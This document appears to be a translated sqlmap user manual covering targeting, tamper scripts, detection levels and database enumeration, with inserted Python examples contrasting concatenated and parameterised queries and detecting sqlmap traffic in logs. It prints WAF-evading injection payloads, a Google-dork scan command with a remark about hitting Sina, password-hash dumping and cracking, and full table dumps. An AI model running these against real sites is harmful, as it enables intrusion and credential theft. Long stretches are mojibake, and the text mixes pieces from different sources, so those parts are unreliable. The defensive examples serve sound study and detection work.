SQLMap User Manual (Very Detailed)

http://192.168.136.131/sqlmap/mysql/get_int.php?id=1

When sqlmap is given a URL like the one above, it will:

1. Determine which parameters are injectable

2. Determine which SQL injection technique can be used

3. Identify which database is in use

4. Read whichever data the user selects

sqlmap supports five different injection modes:

1. Boolean-based blind injection: whether a condition is true or false can be judged from the returned page.

2. Time-based blind injection: nothing can be judged from the page content; a conditional statement is used to check whether a time-delay statement executed (i.e. whether the page's response time increased).

3. Error-based injection: the page returns error messages, or returns the result of the injected statement directly in the page.

4. UNION query injection: injection where a UNION can be used.

5. Stacked query injection: injection where several statements can be executed at once.

Databases supported by sqlmap:

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB

You can provide a single URL, a Burp or WebScarab request log file, a complete HTTP request in a text file, or a Google search whose result pages are matched; you can also define a regular expression to decide which addresses to test.

It tests GET parameters, POST parameters, HTTP Cookie parameters, the HTTP User-Agent header and the HTTP Referer header for SQL injection, and you can also specify a comma-separated list of particular parameters to test.

The number of concurrent HTTP(S) requests can be set to make blind injection more efficient.

Videos of people using sqlmap on YouTube:

http://www.youtube.com/user/inquisb/videos

http://www.youtube.com/user/stamparm/videos

Articles with sqlmap usage examples:

http://unconciousmind.blogspot.com/search/label/sqlmap

You can download the latest version of sqlmap from https://github.com/sqlmapproject/sqlmap/tarball/master.

You can also get sqlmap with git:

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Afterwards you can update it directly with the command

python sqlmap.py --update

or

git pull

to update sqlmap.

If you want to observe how sqlmap probes a target, what it judges and how it reads data, use the -v parameter.

There are seven verbosity levels; the default is 1:

0. Show only Python errors and critical messages.

1. Also show basic information and warnings. (default)

2. Also show debug messages.

3. Also show injected payloads.

4. Also show HTTP requests.

5. Also show HTTP response headers.

6. Also show HTTP response pages.

If you want to see the test payloads sqlmap sends, level 3 is the best choice.

Ways of specifying targets

Target URL

Parameter: -u or --url

Format: http(s)://targeturl[:port]/[…]

Example: python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

Getting logs from a Burp or WebScarab proxy

Parameter: -l

You can export the log from Burp proxy or WebScarab proxy and hand it straight to sqlmap, which tests the requests one by one for injection.

Scanning multiple targets from a text file

Parameter: -m

The URLs are saved in the file in the following format; sqlmap tests them one by one:

www.target1.com/vuln1.php?q=foobar

www.target2.com/vuln2.asp?id=1

www.target3.com/vuln3/id/1*

Loading an HTTP request from a file

Parameter: -r

sqlmap can read an HTTP request from a text file, which lets you skip setting a number of other parameters (cookies, POST data, and so on).

For example, the text file contains:

POST /vuln.php HTTP/1.1

Host: www.target.com

User-Agent: Mozilla/4.0

id=1

When the request is HTTPS you need to combine this with the --force-ssl parameter, or you can append :443 to the Host header.

Processing Google search results

Parameter: -g

sqlmap can test the GET parameters of the pages returned by a Google search for injection (only the first 100 results are fetched).

Example:

python sqlmap.py -g "inurl:\".php?id=1\""

(A very impressive feature: I tried it, and within the first dozen or so results it found an injection point on Sina.)

In addition, the -c parameter can be used to load the relevant configuration from the sqlmap.conf file.

Request

HTTP data

Parameter: --data

This parameter submits the data as a POST request; sqlmap tests POST parameters just as it tests GET parameters.

Example:

python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users

Parameter delimiter

Parameter: --param-del

Use this parameter when the GET or POST data separates the parameters to be tested with a character other than the usual one.

Example:

python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

HTTP Cookie header

Parameters: --cookie, --load-cookies, --drop-set-cookie

This parameter is useful in two situations:

1. When the web application requires a login.

2. When you want to test these header values for SQL injection.

You can obtain the cookie by capturing the traffic, copy it out, and pass it with the --cookie parameter.

When sqlmap encounters a Set-Cookie header during the HTTP exchange, it automatically picks the cookie up, adds it to subsequent requests, and also tries SQL injection on it.

If you do not want to accept Set-Cookie, use --drop-set-cookie to reject it.

When you use --cookie and a Set-Cookie header is returned, sqlmap asks which cookie to use for the following requests. When --level is set to 2 or above, sqlmap tries to inject the Cookie parameters.

HTTP User-Agent header

Parameters: --user-agent, --random-agent

By default the User-Agent value in sqlmap's HTTP request headers is:

sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

You can change it with --user-agent, or use --random-agent to pick one at random from ./txt/user-agents.txt.

When --level is set to 3 or above, sqlmap tries to inject the User-Agent.

HTTP Referer header

Parameter: --referer

sqlmap can forge the HTTP Referer in its requests; when --level is set to 3 or above it tries to inject the Referer.

Extra HTTP headers

Parameter: --headers

Extra HTTP headers can be added with the --headers parameter.

HTTP authentication

Parameters: --auth-type, --auth-cred

These parameters log in through the HTTP authentication that protects the target; three methods are supported:

1. Basic

2. Digest

3. NTLM

Example:

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"

HTTP client certificate authentication

Parameter: --auth-cert

When the web server requires a client certificate for authentication, two files must be provided: key_file and cert_file.

key_file is a PEM-format file containing your private key; cert_file is a PEM-format certificate chain file.

HTTP(S) proxy

Parameters: --proxy, --proxy-cred and --ignore-proxy

The --proxy value has the format http://url:port.

When the HTTP(S) proxy requires authentication, use --proxy-cred in the form username:password.

--ignore-proxy refuses to use the HTTP(S) proxy configured for the local network.

HTTP request delay

Parameter: --delay

Sets the delay between two HTTP(S) requests; 0.5 means half a second. By default there is no delay.

Setting the timeout

Parameter: --timeout

Sets how long an HTTP(S) request may take before it is considered timed out; 10.5 means 10.5 seconds. The default is 30 seconds.

Setting retries on timeout

Parameter: --retries

When an HTTP(S) request times out, the number of reconnection attempts can be set; the default is 3.

Randomly changing parameter values

Parameter: --randomize

The value of a given parameter can be changed randomly on every request; the length and type stay the same as the initial value provided.

Filtering target URLs with a regular expression

Parameter: --scope

Example:

python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

Avoiding being blocked after too many erroneous requests

Parameters: --safe-url, --safe-freq

Some web applications block all of your subsequent requests once you have made too many erroneous ones. sqlmap's detection or injection can produce such erroneous requests and trigger this policy, after which nothing further can be done.

There are two ways to work around this policy:

1. --safe-url: provide a safe URL that never errors; it is visited every so often.

2. --safe-freq: provide a safe URL that never errors; after every test request the safe URL is visited again.

Turning off URL encoding of parameter values

Parameter: --skip-urlencode

Depending on its position, a parameter's value is URL-encoded by default, but sometimes the back-end web server does not follow the RFC standard and only accepts values that are not URL-encoded; in that case you need --skip-urlencode.

Executing custom Python code on every request

Parameter: --eval

Sometimes one parameter has to be modified in step with changes to another parameter to form a valid request. --eval runs the given Python code on every request and sends the request only after that modification.

Example:

python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

The request above computes the md5 of the id parameter's value on every request and uses it as the value of the hash parameter.

Injection

Test parameters

Parameters: -p, --skip

By default sqlmap tests all GET and POST parameters; when --level is 2 or higher it also tests the HTTP Cookie header values, and when it is 3 or higher it also tests the User-Agent and HTTP Referer header values. You can, however, set the parameters to test manually with -p. For example: -p "id,user-agent"

When you use a high --level value but there are individual parameters you do not want to test, use --skip.

For example: --skip="user-agent,referer"

Sometimes the web server uses URL rewriting, so sqlmap cannot test the parameters directly; you can then append * after the value you want to test.

Example:

python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

sqlmap will test whether the position of value1 is injectable.

Specifying the database

Parameter: --dbms

By default sqlmap automatically detects which database backs the web application. The databases supported by sqlmap are:

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase, SAP MaxDB, DB2

Specifying the database server operating system

Parameter: --os

By default sqlmap automatically detects the database server's operating system; the supported systems are Linux and Windows.

Specifying an invalid big number

Parameter: --invalid-bignum

Use this parameter when you want to choose the value used to produce an error; for example, by default for id=13 sqlmap switches to id=-13 to provoke the error, but you can specify something like id=9999999 instead.

Specifying invalid logic

Parameter: --invalid-logical

For the same reason as above, for id=13 the original erroring value id=-13 can be replaced by id=13 AND 18=19.

Injection payload

Parameters: --prefix, --suffix

In some environments, characters must be added before or after the injected payload for the payload to execute correctly.

For example, the code calls the database like this:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

Then you need the --prefix and --suffix parameters:

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"

The SQL statement that gets executed then becomes:

$query = "SELECT * FROM users WHERE id=('1') AND ('abc'='abc') LIMIT 0, 1";
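
To make the effect of that prefix and suffix concrete from the application side, here is an added example (not part of the original manual and not sqlmap code) that rebuilds the PHP query above in Python against an in-memory SQLite table filled with constructed sample rows. It runs the query once the way the PHP does, by splicing the raw parameter into the SQL text, and once with a bound parameter, and feeds both forms a normal id plus a true and a false variant of the page's injected condition. Only the concatenated form reacts to the condition, which is exactly the true/false difference boolean-based detection relies on; the parameterised form treats the whole value as one literal and returns nothing for either payload.

```python
import sqlite3

# Constructed sample rows standing in for the page's `users` table.
SAMPLE_USERS = [(1, "luther", "blisset"), (2, "fluffy", "bunny"), (3, "wu", "ming")]

# The page's --prefix "')" closes the quoted, parenthesised value; the
# --suffix "AND ('abc'='abc" re-opens a string so the original ") LIMIT 0, 1"
# tail still parses. One true and one false variant of the injected condition:
PAYLOAD_TRUE = "1') AND ('abc'='abc"
PAYLOAD_FALSE = "1') AND ('abc'='xyz"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, surname TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def query_concatenated(conn, user_id):
    """Mirrors the vulnerable PHP: the raw parameter becomes part of the SQL text."""
    sql = "SELECT * FROM users WHERE id=('" + user_id + "') LIMIT 0, 1"
    return conn.execute(sql).fetchall()


def query_parameterised(conn, user_id):
    """Hardened form: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT * FROM users WHERE id=(?) LIMIT 0, 1"
    return conn.execute(sql, (user_id,)).fetchall()


def compare():
    """Run both query styles on a normal id and on the two payloads."""
    conn = make_db()
    return {
        "concat_normal": query_concatenated(conn, "1"),
        "concat_true": query_concatenated(conn, PAYLOAD_TRUE),
        "concat_false": query_concatenated(conn, PAYLOAD_FALSE),
        "param_normal": query_parameterised(conn, "1"),
        "param_true": query_parameterised(conn, PAYLOAD_TRUE),
        "param_false": query_parameterised(conn, PAYLOAD_FALSE),
    }


if __name__ == "__main__":
    for name, rows in compare().items():
        print("%-13s -> %r" % (name, rows))
```

The concatenated query returns the first row for both the normal id and the true payload and nothing for the false payload, so a page built on it leaks one bit per request; the parameterised query only ever matches a literal id, so the same payloads produce no observable difference.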

淇敼娉ㄥ叆鐨勬暟鎹�

鍙傛暟锛�--tamper

sqlmap闄や簡浣跨敤CHAR()鍑芥暟鏉ラ槻姝㈠嚭鐜板崟寮曞彿涔嬪娌℃湁瀵规敞鍏ョ殑鏁版嵁淇敼锛屼綘鍙互浣跨敤--tamper鍙傛暟瀵规暟鎹仛淇敼鏉ョ粫杩嘩AF绛夎澶囥��

涓嬮潰鏄竴涓猼amper鑴氭湰鐨勬牸寮忥細

# Needed imports
from lib.core.enums import PRIORITY

# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL


def tamper(payload, **kwargs):
    '''
    Description of your tamper script

    sqlmap passes additional keyword arguments (for example the request
    headers) to tamper functions, so accepting **kwargs keeps the script
    compatible with the tamper() signature the tamper/ directory uses.
    '''

    retVal = payload

    # your code to tamper the original payload

    # return the tampered payload
    return retVal

鍙互鏌ョ湅 tamper/ 鐩綍涓嬬殑鏈夊摢浜涘彲鐢ㄧ殑鑴氭湰

渚嬪锛�

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
[hh:mm:03] [DEBUG] cleaning up configuration parameters
[hh:mm:03] [INFO] loading tamper script 'between'
[hh:mm:03] [INFO] loading tamper script 'randomcase'
[hh:mm:03] [INFO] loading tamper script 'space2comment'
[...]
[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
[...]
[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar(
58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/
ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/
group/**/bY/**/x)a)
[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING
clause' injectable
[...]
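
The default User-Agent from the request section above and the tampered payloads visible in this -v 3 output are the traces a defender can look for in web server logs. The following added example (not from the original manual or from sqlmap) scans access-log lines for them: the sqlmap/ User-Agent, /**/ comments standing in for spaces (space2comment), mixed-case SQL keywords (randomcase), numeric boolean pairs such as AND 1369=7706, information_schema references and the CHAR()/CONCAT()/FLOOR()/RAND() error-based construction. The log lines are constructed samples in combined log format, and the indicator names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format); not taken from the page.
SAMPLE_LOG = r'''10.0.0.5 - - [11/Apr/2011:10:21:03 +0100] "GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Apr/2011:10:21:04 +0100] "GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)"
10.0.0.9 - - [11/Apr/2011:10:21:04 +0100] "GET /sqlmap/mysql/get_int.php?id=1%29/**/And/**/1369%3D7706/**/And/**/%284092%3D4092 HTTP/1.1" 200 480 "-" "Mozilla/4.0"
10.0.0.9 - - [11/Apr/2011:10:21:05 +0100] "GET /sqlmap/mysql/get_int.php?id=1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar(58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/group/**/bY/**/x)a) HTTP/1.1" 500 221 "-" "Mozilla/4.0"
10.0.0.7 - - [11/Apr/2011:10:22:00 +0100] "GET /search.php?q=and+the+best HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SQL_KEYWORDS = {"and", "or", "select", "from", "union", "where", "group", "by", "having"}
FUNC_RE = re.compile(r"\b(?:char|concat|floor|rand)\s*\(", re.I)
BOOL_RE = re.compile(r"\b(?:and|or)\s+\(?\d+=\d+", re.I)


def indicators_for(path, user_agent):
    """Return the set of indicator names that match one request."""
    found = set()
    if user_agent.lower().startswith("sqlmap/"):
        found.add("sqlmap default User-Agent")
    decoded = unquote_plus(path)
    if "/**/" in decoded:
        found.add("inline comment as whitespace")
    # Treat comments as whitespace before looking for keyword patterns.
    normalised = re.sub(r"/\*.*?\*/", " ", decoded)
    if BOOL_RE.search(normalised):
        found.add("boolean comparison pair")
    if "information_schema" in normalised.lower():
        found.add("information_schema reference")
    if FUNC_RE.search(normalised):
        found.add("error-based payload function")
    for word in re.findall(r"[A-Za-z]+", normalised):
        # randomcase leaves keywords that are neither all-lower nor all-upper
        if word.lower() in SQL_KEYWORDS and word not in (word.lower(), word.upper()):
            found.add("mixed-case SQL keyword")
            break
    return found


def analyse_log(text):
    """Parse each log line and report the ones carrying at least one indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        found = indicators_for(m.group("path"), m.group("ua"))
        if found:
            hits.append({"ip": m.group("ip"), "path": m.group("path"),
                         "indicators": sorted(found)})
    return hits


if __name__ == "__main__":
    for hit in analyse_log(SAMPLE_LOG):
        print(hit["ip"], hit["indicators"])
```

The User-Agent check alone is defeated by --random-agent, so the payload-shape indicators matter more in practice; the last sample line shows why the keyword checks require a numeric comparison or a mixed-case token rather than the bare word "and", which appears in ordinary search queries.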

Detection

Detection level

Parameter: --level

There are five levels; the default is 1. The payloads sqlmap uses can be seen in xml/payloads.xml, and you can add your own payloads in the same format.

This parameter affects not only which payloads are used but also which injection points are tested: GET and POST data are always tested, the HTTP Cookie is tested from level 2, and the HTTP User-Agent/Referer headers from level 3.

In short, when you are not sure which payload or parameter is the injection point, a high level value is recommended for the sake of completeness.

Risk level

Parameter: --risk

There are four risk levels. The default, 1, runs most of the test statements; 2 adds heavy time-based test statements; 3 adds OR-based SQL injection tests.

In some cases, for example inside an UPDATE statement, injecting an OR test statement can update the whole table, which is a considerable risk.

The test statements can likewise be found in xml/payloads.xml, and you can add your own payloads.

Page comparison

Parameters: --string, --not-string, --regexp, --code

By default sqlmap judges true and false by the differences between returned pages, but sometimes that produces errors, because some pages return different content on every refresh, for example a page containing a dynamic advertisement or other changing content, which misleads sqlmap. In that case the user can supply a string or a regular expression that is present in both the original page and the true-condition page but absent from the false page (--string adds a string, --regexp a regular expression); the user can likewise supply a string that is absent from both the original page and the true-condition page but present in the false page (--not-string). The user can also rely on the true and false conditions returning different HTTP status codes, for example 200 for true and 401 for false, by adding --code=200.

Parameters: --text-only, --titles

Sometimes the user knows where the true-condition and false-condition pages differ; use --text-only (difference in the HTTP response body text) or --titles (difference in the HTML title tag).

Injection techniques

Choosing the injection techniques to test

Parameter: --technique

This parameter specifies which detection techniques sqlmap uses; by default all of them are tested.

The supported techniques are:

B: Boolean-based blind SQL injection

E: Error-based SQL injection

U: UNION query SQL injection

S: Stacked queries SQL injection

T: Time-based blind SQL injection

Setting the delay for time-based injection

Parameter: --time-sec

When using time-based blind injection, use --time-sec to set the delay; the default is 5 seconds.

Setting the number of UNION query columns

Parameter: --union-cols

By default sqlmap tests 1 to 10 columns for UNION query injection; at --level 5 it extends the test to 50 columns. The value of --union-cols should be an integer range, e.g. 12-16, which tests 12 to 16 columns.

Setting the character used in UNION queries

Parameter: --union-char

By default sqlmap uses NULL in UNION query injection, but in some cases that makes the page fail while a random integer succeeds; then you can set the character used in the UNION query with --union-char.

Second-order SQL injection

Parameter: --second-order

Sometimes the result of data entered at the injection point is not shown on the current page but on another page; you must then specify which page to fetch to judge the response. --second-order is followed by the URL of the page to judge from.

Enumeration

Banner

Parameters: -b, --banner

Most database systems have a function that returns the database version; usually it is version() or the variable @@version, depending on the database.

Current user

Parameter: --current-user

In most databases the user under which the data is being managed can be retrieved.

Current database

Parameter: --current-db

Returns the currently connected database.

Whether the current user is an administrator

Parameter: --is-dba

Checks whether the current user is an administrator; if so, True is returned.

Listing database users

Parameter: --users

When the current user has permission to read the table containing all users, all administrative users can be listed.

Listing and cracking database user password hashes

Parameter: --passwords

When the current user has permission to read the table containing user passwords, sqlmap first enumerates the users, then lists their hashes and tries to crack them.

Example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:38] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt]
[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
database management system users password hashes:
[*] postgres [1]:
    password hash: md5d7d880f96044b72d0bba108ace96d1e4
    clear-text password: testpass
[*] testuser [1]:
    password hash: md599e5ea7a6f7c3269995cba3927fd0093
    clear-text password: testpass

鍙互鐪嬪埌sqlmap涓嶄粎鍕掑嚭鏁版嵁搴撶殑鐢ㄦ埛璺熷瘑鐮侊紝鍚屾椂涔熻瘑鍒嚭鏄疨ostgreSQL鏁版嵁搴擄紝骞惰闂敤鎴锋槸鍚﹂噰鐢ㄥ瓧鍏哥垎鐮寸殑鏂瑰紡杩涜鐮磋В锛岃繖涓垎鐮村凡缁忔敮鎸丱racle鍜孧icrosoft SQL Server銆�

涔熷彲浠ユ彁渚�-U鍙傛暟鏉ユ寚瀹氱垎鐮村摢涓敤鎴风殑hash銆�

鍒楀嚭鏁版嵁搴撶鐞嗗憳鏉冮檺

鍙傛暟锛�--privileges

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚墍鏈夌敤鎴风殑琛ㄧ殑鏉冮檺鏃讹紝寰堝彲鑳藉垪涓惧嚭姣忎釜鐢ㄦ埛鐨勬潈闄愶紝sqlmap灏嗕細鍛婅瘔浣犲摢涓槸鏁版嵁搴撶殑瓒呯骇绠$悊鍛樸�備篃鍙互鐢�-U鍙傛暟鎸囧畾浣犳兂鐪嬪摢涓敤鎴风殑鏉冮檺銆�

鍒楀嚭鏁版嵁搴撶鐞嗗憳瑙掕壊

鍙傛暟锛�--roles

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚墍鏈夌敤鎴风殑琛ㄧ殑鏉冮檺鏃讹紝寰堝彲鑳藉垪涓惧嚭姣忎釜鐢ㄦ埛鐨勮鑹诧紝涔熷彲浠ョ敤-U鍙傛暟鎸囧畾浣犳兂鐪嬪摢涓敤鎴风殑瑙掕壊銆�

浠呴�傜敤浜庡綋鍓嶆暟鎹簱鏄疧racle鐨勬椂鍊欍��

鍒楀嚭鏁版嵁搴撶郴缁熺殑鏁版嵁搴�

鍙傛暟锛�--dbs

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚墍鏈夋暟鎹簱鍒楄〃淇℃伅鐨勮〃涓殑鏃跺�欙紝鍗冲彲鍒楀嚭鎵�鏈夌殑鏁版嵁搴撱��

鍒椾妇鏁版嵁搴撹〃

鍙傛暟锛�--tables,--exclude-sysdbs,-D

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚墍鏈夋暟鎹簱琛ㄤ俊鎭殑琛ㄤ腑鐨勬椂鍊欙紝鍗冲彲鍒楀嚭涓�涓壒瀹氭暟鎹殑鎵�鏈夎〃銆�

濡傛灉浣犱笉鎻愪緵-D鍙傛暟鏉ュ垪鎸囧畾鐨勪竴涓暟鎹殑鏃跺�欙紝sqlmap浼氬垪鍑烘暟鎹簱鎵�鏈夊簱鐨勬墍鏈夎〃銆�

--exclude-sysdbs鍙傛暟鏄寚鍖呭惈浜嗘墍鏈夌殑绯荤粺鏁版嵁搴撱��

闇�瑕佹敞鎰忕殑鏄湪Oracle涓綘闇�瑕佹彁渚涚殑鏄疶ABLESPACE_NAME鑰屼笉鏄暟鎹簱鍚嶇О銆�

鍒椾妇鏁版嵁搴撹〃涓殑瀛楁

鍙傛暟锛�--columns,-C,-T,-D

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚墍鏈夋暟鎹簱琛ㄤ俊鎭殑琛ㄤ腑鐨勬椂鍊欙紝鍗冲彲鍒楀嚭鎸囧畾鏁版嵁搴撹〃涓殑瀛楁锛屽悓鏃朵篃浼氬垪鍑哄瓧娈电殑鏁版嵁绫诲瀷銆�

濡傛灉娌℃湁浣跨敤-D鍙傛暟鎸囧畾鏁版嵁搴撴椂锛岄粯璁や細浣跨敤褰撳墠鏁版嵁搴撱��

鍒椾妇涓�涓猄QLite鐨勪緥瀛愶細

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users -C name
[...]
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| id      | INTEGER |
| name    | TEXT    |
| surname | TEXT    |
+---------+---------+

Enumerating the database schema

Parameters: --schema, --exclude-sysdbs

With this parameter the user can retrieve the database schema: all databases, tables and columns, with their respective types.

With --exclude-sysdbs added, the contents of the built-in system databases are not retrieved.

MySQL example:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --schema --batch --exclude-sysdbs
[...]
Database: owasp10
Table: accounts
[4 columns]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| cid         | int(11) |
| mysignature | text    |
| password    | text    |
| username    | text    |
+-------------+---------+

Database: owasp10
Table: blogs_table
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| date         | datetime |
| blogger_name | text     |
| cid          | int(11)  |
| comment      | text     |
+--------------+----------+

Database: owasp10
Table: hitlog
[6 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| date     | datetime |
| browser  | text     |
| cid      | int(11)  |
| hostname | text     |
| ip       | text     |
| referer  | text     |
+----------+----------+

Database: testdb
Table: users
[3 columns]
+---------+---------------+
| Column  | Type          |
+---------+---------------+
| id      | int(11)       |
| name    | varchar(500)  |
| surname | varchar(1000) |
+---------+---------------+
[...]

Getting the number of entries in a table

Parameter: --count

Sometimes the user only wants the number of entries in a table rather than its contents; this parameter does that.

A Microsoft SQL Server example:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+

Dumping an entire table

Parameters: --dump, -C, -T, -D, --start, --stop, --first, --last

If the current account has permission to read one of the database's tables, the entire contents of that table can be retrieved.

Use -D and -T to specify which database's table you want; when -D is not used, the current database is the default.

A Firebird example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME   | SURNAME    |
+----+--------+------------+
| 1  | luther | blisset    |
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 4  | NULL   | nameisnull |
+----+--------+------------+

鍙互鑾峰彇鎸囧畾搴撲腑鐨勬墍鏈夎〃鐨勫唴瀹癸紝鍙敤-dump璺�-D鍙傛暟锛堜笉浣跨敤-T涓�-C鍙傛暟锛夈��

涔熷彲浠ョ敤-dump璺�-C鑾峰彇鎸囧畾鐨勫瓧娈靛唴瀹广��

sqlmap涓烘瘡涓〃鐢熸垚浜嗕竴涓狢SV鏂囦欢銆�

濡傛灉浣犲彧鎯宠幏鍙栦竴娈垫暟鎹紝鍙互浣跨敤--start鍜�--stop鍙傛暟锛屼緥濡傦紝浣犲彧鎯宠幏鍙栫涓�娈垫暟鎹彲hi浣跨敤--stop 1锛屽鏋滄兂鑾峰彇绗簩娈典笌绗笁娈垫暟鎹紝浣跨敤鍙傛暟 --start 1 --stop 3銆�

涔熷彲浠ョ敤--first涓�--last鍙傛暟锛岃幏鍙栫鍑犱釜瀛楃鍒扮鍑犱釜瀛楃鐨勫唴瀹癸紝濡傛灉浣犳兂鑾峰彇瀛楁涓湴涓変釜瀛楃鍒扮浜斾釜瀛楃鐨勫唴瀹癸紝浣跨敤--first 3 --last 5锛屽彧鍦ㄧ洸娉ㄧ殑鏃跺�欎娇鐢紝鍥犱负鍏朵粬鏂瑰紡鍙互鍑嗙‘鐨勮幏鍙栨敞鍏ュ唴瀹癸紝涓嶉渶瑕佷竴涓瓧绗︿竴涓瓧绗︾殑鐚滆В銆�

鑾峰彇鎵�鏈夋暟鎹簱琛ㄧ殑鍐呭

鍙傛暟锛�--dump-all,--exclude-sysdbs

浣跨敤--dump-all鍙傛暟鑾峰彇鎵�鏈夋暟鎹簱琛ㄧ殑鍐呭锛屽彲鍚屾椂鍔犱笂--exclude-sysdbs鍙幏鍙栫敤鎴锋暟鎹簱鐨勮〃锛岄渶瑕佹敞鎰忓湪Microsoft SQL Server涓璵aster鏁版嵁搴撴病鏈夎�冭檻鎴愪负涓�涓郴缁熸暟鎹簱锛屽洜涓烘湁鐨勭鐞嗗憳浼氭妸浠栧綋鍒濈敤鎴锋暟鎹簱涓�鏍锋潵浣跨敤瀹冦��

鎼滅储瀛楁锛岃〃锛屾暟鎹簱

鍙傛暟锛�--search,-C,-T,-D

--search鍙互鐢ㄦ潵瀵绘壘鐗瑰畾鐨勬暟鎹簱鍚嶏紝鎵�鏈夋暟鎹簱涓殑鐗瑰畾琛ㄥ悕锛屾墍鏈夋暟鎹簱琛ㄤ腑鐨勭壒瀹氬瓧娈点��

鍙互鍦ㄤ竴涓嬩笁绉嶆儏鍐典笅浣跨敤锛�

-C鍚庤窡鐫�鐢ㄩ�楀彿鍒嗗壊鐨勫垪鍚嶏紝灏嗕細鍦ㄦ墍鏈夋暟鎹簱琛ㄤ腑鎼滅储鎸囧畾鐨勫垪鍚嶃��

-T鍚庤窡鐫�鐢ㄩ�楀彿鍒嗗壊鐨勮〃鍚嶏紝灏嗕細鍦ㄦ墍鏈夋暟鎹簱涓悳绱㈡寚瀹氱殑琛ㄥ悕

-D鍚庤窡鐫�鐢ㄩ�楀彿鍒嗗壊鐨勫簱鍚嶏紝灏嗕細鍦ㄦ墍鏈夋暟鎹簱涓悳绱㈡寚瀹氱殑搴撳悕銆�

